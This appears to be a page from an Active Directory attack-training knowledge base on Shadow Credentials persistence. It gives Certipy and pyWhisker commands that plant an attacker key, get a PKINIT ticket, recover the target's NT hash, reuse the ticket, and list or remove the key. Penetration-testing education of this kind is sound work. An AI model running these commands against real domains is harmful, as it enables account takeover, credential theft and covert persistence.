Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Persistence / Techniques

Shadow Credentials

Shadow Credentials persistence adds an attacker-controlled public key to msDS-KeyCredentialLink on a user or computer account. As long as that key credential remains, we can authenticate with PKINIT as the target without knowing the target password.

Variables

export DOMAIN=ootw.local
export DC=10.10.10.200
export USER=student
export PASS='student'
export TARGET=svc_web

Automatic Certipy flow

certipy shadow auto -u "$USER@$DOMAIN" -p "$PASS" -account "$TARGET" -dc-ip $DC

Manual add with pyWhisker

python3 pywhisker.py -d $DOMAIN -u $USER -p "$PASS" --target "$TARGET" --action add --filename "$TARGET"
python3 gettgtpkinit.py -cert-pfx "$TARGET.pfx" -pfx-pass PFX_PASSWORD "$DOMAIN/$TARGET" "$TARGET.ccache"
export KRB5CCNAME="$TARGET.ccache"
klist

Recover NT hash from PKINIT

python3 getnthash.py -key AS_REP_KEY "$DOMAIN/$TARGET"

Use the ticket

nxc ldap $DC -k --use-kcache
nxc smb $DC -k --use-kcache

List key credentials

certipy shadow list -u "$USER@$DOMAIN" -p "$PASS" -account "$TARGET" -dc-ip $DC
python3 pywhisker.py -d $DOMAIN -u $USER -p "$PASS" --target "$TARGET" --action list

Remove key credentials

certipy shadow remove -u "$USER@$DOMAIN" -p "$PASS" -account "$TARGET" -dc-ip $DC -device-id DEVICE_ID
python3 pywhisker.py -d $DOMAIN -u $USER -p "$PASS" --target "$TARGET" --action remove --device-id DEVICE_ID

Notes

  • Shadow Credentials are attribute persistence.
  • Password rotation alone does not remove the attacker key.
  • The exact msDS-KeyCredentialLink blob has to be removed.
  • Computer accounts are excellent targets because they often have useful delegation or local admin paths.